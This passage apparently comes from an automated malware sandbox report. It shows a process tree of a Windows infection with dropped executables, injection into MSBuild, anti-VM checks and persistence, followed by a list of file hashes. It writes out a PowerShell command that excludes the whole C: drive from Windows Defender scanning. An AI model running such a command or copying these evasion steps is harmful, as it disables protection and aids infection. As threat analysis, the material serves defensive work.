                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10413410101\YGYZCmt.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10413410101\YGYZCmt.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                        PID:1240
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                          7⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:3104
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10413420101\Rm3cVPI.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10413420101\Rm3cVPI.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        PID:4304
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10413430101\p3hx1_003.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10413430101\p3hx1_003.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                        PID:5264
                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                          cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                          7⤵
                                                                                                                                                            PID:2128
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                              8⤵
                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                              PID:4552
                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                            "C:\Windows\system32\svchost.exe"
                                                                                                                                                            7⤵
                                                                                                                                                            • Downloads MZ/PE file
                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                            PID:2244
                                                                                                                                                            • C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
                                                                                                                                                              "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
                                                                                                                                                              8⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:388
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
                                                                                                                                                              8⤵
                                                                                                                                                              • Deletes itself
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:2436
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10413440101\qWR3lUj.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10413440101\qWR3lUj.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          PID:5612
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                            7⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:5672
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10413450101\TbV75ZR.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10413450101\TbV75ZR.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:5796
                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                              7⤵
                                                                                                                                                                PID:3004
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                    1⤵
                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                    PID:672
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
                                                                                                                                                    1⤵
                                                                                                                                                      PID:5088
                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                                                      1⤵
                                                                                                                                                        PID:1640
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5592
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                          1⤵
                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                          PID:4576
                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                                                          1⤵
                                                                                                                                                            PID:872
                                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
                                                                                                                                                            1⤵
                                                                                                                                                              PID:6112

                                                                                                                                                            Network

                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                            Replay Monitor

                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                            Downloads

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                                                              Filesize

                                                                                                                                                              649B

                                                                                                                                                              MD5

                                                                                                                                                              c688e60a69fab22c6bd8d13a677eda15

                                                                                                                                                              SHA1

                                                                                                                                                              355c62108981c92230e3d00b7c9bb5a28d5e3ec6

                                                                                                                                                              SHA256

                                                                                                                                                              11bff58034963732f47ef32fa08e4f48c574b191bc0acc98cb8b4c270a594dea

                                                                                                                                                              SHA512

                                                                                                                                                              9231cc2b447bbdec8c0914942fa948cf9062315768879d20bce8160ba94eb6e61ec54a3ad6304fd1c747e274b7f8a7cd1e9448a896762b888c7c2134e25fc806

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                              Filesize

                                                                                                                                                              2B

                                                                                                                                                              MD5

                                                                                                                                                              d751713988987e9331980363e24189ce

                                                                                                                                                              SHA1

                                                                                                                                                              97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                              SHA256

                                                                                                                                                              4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                              SHA512

                                                                                                                                                              b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                              Filesize

                                                                                                                                                              9KB

                                                                                                                                                              MD5

                                                                                                                                                              eb7e8e42b0573745361dd64b808f571a

                                                                                                                                                              SHA1

                                                                                                                                                              a0744f9984a1f6a5cbf5e5bb1cb8daaf2f8644fa

                                                                                                                                                              SHA256

                                                                                                                                                              e87b730c304ba86ad7f04b7d18fe6dc57bb92a78590dd3b9a361ea3ef4b2566a

                                                                                                                                                              SHA512

                                                                                                                                                              053e037b482fe34793cea2542c088dbc925bcefba4b1fbca3e22597d1c692b8a2a6538d808b26342875a5c37a6e19673061481be5452292340a1d8c39bcf6958

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                              Filesize

                                                                                                                                                              13KB

                                                                                                                                                              MD5

                                                                                                                                                              5f3d48c77299ca2a2f755a8699b69395

                                                                                                                                                              SHA1

                                                                                                                                                              62058681d9d57fdefed7c10ed211c8e110171c92

                                                                                                                                                              SHA256

                                                                                                                                                              e7e40c961f9aef29352e8c3cb921cc1fc55163a5c2c22f33ec655d931a9ea277

                                                                                                                                                              SHA512

                                                                                                                                                              711acbf7b018911db113a282fbac15caa89cacdad90e9ccc1872c35f61d2feb6a7abf63fd20cbdb3d080367e3bb5137bdb76aab27cb1b29090ecbab9ea83270b

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\CURRENT

                                                                                                                                                              Filesize

                                                                                                                                                              16B

                                                                                                                                                              MD5

                                                                                                                                                              46295cac801e5d4857d09837238a6394

                                                                                                                                                              SHA1

                                                                                                                                                              44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                                                                                                                                              SHA256

                                                                                                                                                              0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                                                                                                                                              SHA512

                                                                                                                                                              8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nmmhkkegccagdldgiimedpiccmgmieda\MANIFEST-000001

                                                                                                                                                              Filesize

                                                                                                                                                              41B

                                                                                                                                                              MD5

                                                                                                                                                              5af87dfd673ba2115e2fcf5cfdb727ab

                                                                                                                                                              SHA1

                                                                                                                                                              d5b5bbf396dc291274584ef71f444f420b6056f1

                                                                                                                                                              SHA256

                                                                                                                                                              f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

                                                                                                                                                              SHA512

                                                                                                                                                              de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                              Filesize

                                                                                                                                                              81KB

                                                                                                                                                              MD5

                                                                                                                                                              67364d4d49b5dc8df849468729017a96

                                                                                                                                                              SHA1

                                                                                                                                                              ff6f99465b6e195dd2dc6b23cec3b3537c1d2830

                                                                                                                                                              SHA256

                                                                                                                                                              9e3c88dd16a2f62062909a4fde1811e943fa6bf2232311373243ed9d94db2f15

                                                                                                                                                              SHA512

                                                                                                                                                              bc8a2215d42738bbfbbc09ab72c5e47a8a6339a79f393e47ed83f208e84d320ecbc3c4a4a5d2134cb8fdfdca27f14f3558d5169c34ca4f9f2067bcd0ab06c0cd

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                                                              Filesize

                                                                                                                                                              80KB

                                                                                                                                                              MD5

                                                                                                                                                              50990cc0c886b4be2d741bf94e4af68e

                                                                                                                                                              SHA1

                                                                                                                                                              bddbbf1e80c52dd905b395829d334383423afcd8

                                                                                                                                                              SHA256

                                                                                                                                                              73721292f2b8fe06ff5b56a85d808d98f3190a988f159719f632f29c6f8f8303

                                                                                                                                                              SHA512

                                                                                                                                                              aca7e9abb6bd37929b6b91bbb1c8a0b6120f5815bf5ae47c9aab0457401338f151b6929732ee6f3cfd168a63822351bc3544cf1d759665aa16605544567f21ed

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                              Filesize

                                                                                                                                                              2KB

                                                                                                                                                              MD5

                                                                                                                                                              2f57fde6b33e89a63cf0dfdd6e60a351

                                                                                                                                                              SHA1

                                                                                                                                                              445bf1b07223a04f8a159581a3d37d630273010f

                                                                                                                                                              SHA256

                                                                                                                                                              3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

                                                                                                                                                              SHA512

                                                                                                                                                              42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                              Filesize

                                                                                                                                                              2KB

                                                                                                                                                              MD5

                                                                                                                                                              25604a2821749d30ca35877a7669dff9

                                                                                                                                                              SHA1

                                                                                                                                                              49c624275363c7b6768452db6868f8100aa967be

                                                                                                                                                              SHA256

                                                                                                                                                              7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

                                                                                                                                                              SHA512

                                                                                                                                                              206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\5ab8776d-8b0b-47c3-a657-7c6896a87714.tmp

                                                                                                                                                              Filesize

                                                                                                                                                              15KB

                                                                                                                                                              MD5

                                                                                                                                                              adb85b673ab8dd11e55cccab42e79cd8

                                                                                                                                                              SHA1

                                                                                                                                                              126f9ca59561f7ec256723588043b6de7d3cddaa

                                                                                                                                                              SHA256

                                                                                                                                                              cc08827150fd131154bea2689501931ced33a14dbdc229091b05752053f504f1

                                                                                                                                                              SHA512

                                                                                                                                                              c1bf17efa8ee3e15b4fd06011fb9df2cc4d4fd6ffe76f2bd0a912b3c9ae96a2752610cc0a4a6d0cf336541e8e20caff2da4a271f706faab68e4b69aca0bf6ecb

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

                                                                                                                                                              Filesize

                                                                                                                                                              2B

                                                                                                                                                              MD5

                                                                                                                                                              99914b932bd37a50b983c5e7c90ae93b

                                                                                                                                                              SHA1

                                                                                                                                                              bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                                                                                                              SHA256

                                                                                                                                                              44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                                                                                                              SHA512

                                                                                                                                                              27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

                                                                                                                                                              Filesize

                                                                                                                                                              107KB

                                                                                                                                                              MD5

                                                                                                                                                              40e2018187b61af5be8caf035fb72882

                                                                                                                                                              SHA1

                                                                                                                                                              72a0b7bcb454b6b727bf90da35879b3e9a70621e

                                                                                                                                                              SHA256

                                                                                                                                                              b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5

                                                                                                                                                              SHA512

                                                                                                                                                              a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_ntp.msn.com_0.indexeddb.leveldb\MANIFEST-000001

                                                                                                                                                              Filesize

                                                                                                                                                              23B

                                                                                                                                                              MD5

                                                                                                                                                              3fd11ff447c1ee23538dc4d9724427a3

                                                                                                                                                              SHA1

                                                                                                                                                              1335e6f71cc4e3cf7025233523b4760f8893e9c9

                                                                                                                                                              SHA256

                                                                                                                                                              720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

                                                                                                                                                              SHA512

                                                                                                                                                              10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              62b6636b91c9ebed012203af9d19aa89

                                                                                                                                                              SHA1

                                                                                                                                                              4a1303f055daf129ad80d65df151d468b2108518

                                                                                                                                                              SHA256

                                                                                                                                                              984eb1744bc1b1b06ab00895364b870b13fd5cd67f45090439c76e1b61c8a531

                                                                                                                                                              SHA512

                                                                                                                                                              680b2bcc4e4b564e09fcc08e5791306c2ed006f100e1e55b5d35fa5f4fff98dbc1c72f549ae0caba89aeca7849f5f383efe0edc5f2988dec33e7ae5607536d11

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

                                                                                                                                                              Filesize

                                                                                                                                                              40B

                                                                                                                                                              MD5

                                                                                                                                                              20d4b8fa017a12a108c87f540836e250

                                                                                                                                                              SHA1

                                                                                                                                                              1ac617fac131262b6d3ce1f52f5907e31d5f6f00

                                                                                                                                                              SHA256

                                                                                                                                                              6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

                                                                                                                                                              SHA512

                                                                                                                                                              507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                              Filesize

                                                                                                                                                              30KB

                                                                                                                                                              MD5

                                                                                                                                                              df28f5f28d6b8c98550683a028af9620

                                                                                                                                                              SHA1

                                                                                                                                                              4db7f24ef4e693902ac0e2363bf69ab5852d133b

                                                                                                                                                              SHA256

                                                                                                                                                              e5cb371e6d1e416a63e7d89dc5db4df8d33f60e40ef453bdd5c94ca0387e1520

                                                                                                                                                              SHA512

                                                                                                                                                              d0e2c5294e76d3299caa41815435de78f5cddbdb3413f19f93d6613922f680e8f3eaf5ae2f7450239df4a824a14e2f01600ac182272dc094d2cf924cf77b4077

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt

                                                                                                                                                              Filesize

                                                                                                                                                              327B

                                                                                                                                                              MD5

                                                                                                                                                              2d4b14b7587cd9f07c5d2b5af9ae3d80

                                                                                                                                                              SHA1

                                                                                                                                                              0c494b5dd3e95c3b5fb3dd8aefd24f3f10d4035a

                                                                                                                                                              SHA256

                                                                                                                                                              06ccb5303336ea71ba394a0e527f9ebd4f3e67c71b6a01b5bcbb91f907f80bea

                                                                                                                                                              SHA512

                                                                                                                                                              cd0c75615df6aca488f5bed9b5bd4a28e799a7c31a9bc1b735801686a62cf7d81bdabf88103d8f4badcdcefeb5c5f9ca0616797e3665562a6e2fca855e180a00

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                              Filesize

                                                                                                                                                              41KB

                                                                                                                                                              MD5

                                                                                                                                                              a1dd11ff17a682766b06237fe310eda9

                                                                                                                                                              SHA1

                                                                                                                                                              7eb542e56f5aa72e9f8d0ec7951bc6594b2cf34b

                                                                                                                                                              SHA256

                                                                                                                                                              439fe74c8bbbc3e390d754a08abb6a47c71563c8343a34fc6be13a88ceea1675

                                                                                                                                                              SHA512

                                                                                                                                                              ec107df26df426f570396cba10b1419c3564a8cf161bf7ed4a1826a1518f600d14297cdd933f11d0f7cb278eb242b62def098c5d599f5d1112834a5cd5468c06

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                                                              Filesize

                                                                                                                                                              40KB

                                                                                                                                                              MD5

                                                                                                                                                              ecf7a10ddaa902df29c6077a614bce8f

                                                                                                                                                              SHA1

                                                                                                                                                              660d3fe700af6b5406a880608bffdee7a0b69670

                                                                                                                                                              SHA256

                                                                                                                                                              5a9af2f258580c0d3a7ba1a810dc7d09e8b617ebb6b444e1a08c0a3ecb76aa2a

                                                                                                                                                              SHA512

                                                                                                                                                              3cf79f1c67cc26b0ea1ba3aa015e28ed16cb14758a3ab434d36621c42c32243c56dc342d35d3f31587e1f3190593cd4ce785f8342d05701c72e2cf6c140d5f20

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                              Filesize

                                                                                                                                                              2KB

                                                                                                                                                              MD5

                                                                                                                                                              de0a136a783fe51ba030c54204917765

                                                                                                                                                              SHA1

                                                                                                                                                              5e8fb8967094cc50adafb0b0b8209edced8d2e08

                                                                                                                                                              SHA256

                                                                                                                                                              d5199af9d9b540e1530a7e8b3c9d19692a868b84ed7eed5cfbe9bf53ba1aa236

                                                                                                                                                              SHA512

                                                                                                                                                              7bc8d116079fe2f892e52d5d5d7cf7755c7ea84ab30731b67d9ee26776d9966e4681db3f8dcdd21be07c5d9184e9454416802883a2e85f11462c8a946b111705

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\WP7READH\service[1].htm

                                                                                                                                                              Filesize

                                                                                                                                                              1B

                                                                                                                                                              MD5

                                                                                                                                                              cfcd208495d565ef66e7dff9f98764da

                                                                                                                                                              SHA1

                                                                                                                                                              b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                                                                                                                              SHA256

                                                                                                                                                              5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                                                                                                                              SHA512

                                                                                                                                                              31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                                                                              Filesize

                                                                                                                                                              53KB

                                                                                                                                                              MD5

                                                                                                                                                              d4d8cef58818612769a698c291ca3b37

                                                                                                                                                              SHA1

                                                                                                                                                              54e0a6e0c08723157829cea009ec4fe30bea5c50

                                                                                                                                                              SHA256

                                                                                                                                                              98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0

                                                                                                                                                              SHA512

                                                                                                                                                              f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              190cc2feb6fbf6a6143f296ebe043de5

                                                                                                                                                              SHA1

                                                                                                                                                              8fa72a99c46ed77b602476c85ca2d8ea251b22fb

                                                                                                                                                              SHA256

                                                                                                                                                              4faea0a40060d02a3ea3ab01102ae3f964c3316146871b6877d845d7e5408206

                                                                                                                                                              SHA512

                                                                                                                                                              94fc8e7d7fdc8fbc6f0b3c0c440b65c6074c22d6f0f328457988764645be763723e17e6c31bbd518cae5953297ec52de09f75c654275d54a8bd5e933ee0cc616

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              e936ffde1732f536cc835ed3e6c83842

                                                                                                                                                              SHA1

                                                                                                                                                              05a7c09e599c32003ea21329932a032ace4f592c

                                                                                                                                                              SHA256

                                                                                                                                                              da9997a3db22d4c3b7900392af3d4a88d09de0df6c4a75d89ea1b271edbb2552

                                                                                                                                                              SHA512

                                                                                                                                                              35d49450a82c671843080c2ff2ff0d33aa5640234958b7e417a9c2f9e20e24b752a4793a99662253e7ad892dcd70904f6524d5e71c0d80333d7d01741c115870

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              3098eab208d0bc2f92db675296dd5278

                                                                                                                                                              SHA1

                                                                                                                                                              c9478ff0ab49d63ca11a9454f2f1df1515bf0019

                                                                                                                                                              SHA256

                                                                                                                                                              303fafa9a4b573a6f42e477f3e09cb4f2f7df9b443a9ee9c8505571804e05cd5

                                                                                                                                                              SHA512

                                                                                                                                                              7cb985090ac3044630a0aeba9f7b339bf03bd78e6dd1dddc952c0f78fffd71304f54fe57e2d3dfec63dccd2929b784e8bbc0c89005a19569b528bd3103608729

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              64B

                                                                                                                                                              MD5

                                                                                                                                                              235a8eb126d835efb2e253459ab8b089

                                                                                                                                                              SHA1

                                                                                                                                                              293fbf68e6726a5a230c3a42624c01899e35a89f

                                                                                                                                                              SHA256

                                                                                                                                                              5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

                                                                                                                                                              SHA512

                                                                                                                                                              a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              64B

                                                                                                                                                              MD5

                                                                                                                                                              446dd1cf97eaba21cf14d03aebc79f27

                                                                                                                                                              SHA1

                                                                                                                                                              36e4cc7367e0c7b40f4a8ace272941ea46373799

                                                                                                                                                              SHA256

                                                                                                                                                              a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                                                                                                                                                              SHA512

                                                                                                                                                              a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              16KB

                                                                                                                                                              MD5

                                                                                                                                                              cf29572c14a12e14d86194af2588f2a4

                                                                                                                                                              SHA1

                                                                                                                                                              008c3ab8e6c47086d5f8cf90680a17c207df0065

                                                                                                                                                              SHA256

                                                                                                                                                              eaef0f6dd6f6a02b8a759d2e6133a2fc06bb510ec8aa58d551deab90b63a3fdc

                                                                                                                                                              SHA512

                                                                                                                                                              d396ac8bdd1d45594fb9a42957bc7255b8b5db5ff69cd299c817977a9eed47b2356caa7419b8e6e6f3bfcb75aecd3fbc5ff3d84527c384fc59895268f76fd0eb

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              18KB

                                                                                                                                                              MD5

                                                                                                                                                              7f1d3e655a36132f44c18f997f1abe9c

                                                                                                                                                              SHA1

                                                                                                                                                              1eae66098256da1066de4f81ec6a6f72c8a41730

                                                                                                                                                              SHA256

                                                                                                                                                              67d59cac9f07cc35fa4de89cb5523d1a972f22b59adf3fc9a8747e78b9104076

                                                                                                                                                              SHA512

                                                                                                                                                              cb417780115efb66910c2bfeb9725053ff3a975f287c27e412c6ae10c51f7ed9f3550357d5dcfce5a4265da1dd7781b834b31aea6f979f0fa5e1f00809ca623b

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              bb1c33a1a3bbff8ced39d26308f77211

                                                                                                                                                              SHA1

                                                                                                                                                              c59c693e72c74c349b245b33b907dfb4e4ba4c3a

                                                                                                                                                              SHA256

                                                                                                                                                              8685999934d4786f68afbe0f7ceeecd3e308fe8886cd2bc269ba7e3d43bf3c90

                                                                                                                                                              SHA512

                                                                                                                                                              2d07992b52f2826969a4d5549f2812fad0999d9b858ae3e56b3ded04d058dfcada1987ae3b0c2c0cbbfed4a3ac734500a89d8750dd1b85351b6efd05202669b3

                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                              Filesize

                                                                                                                                                              1KB

                                                                                                                                                              MD5

                                                                                                                                                              31d29ff3f201714afca0833a9e5dbd69

                                                                                                                                                              SHA1

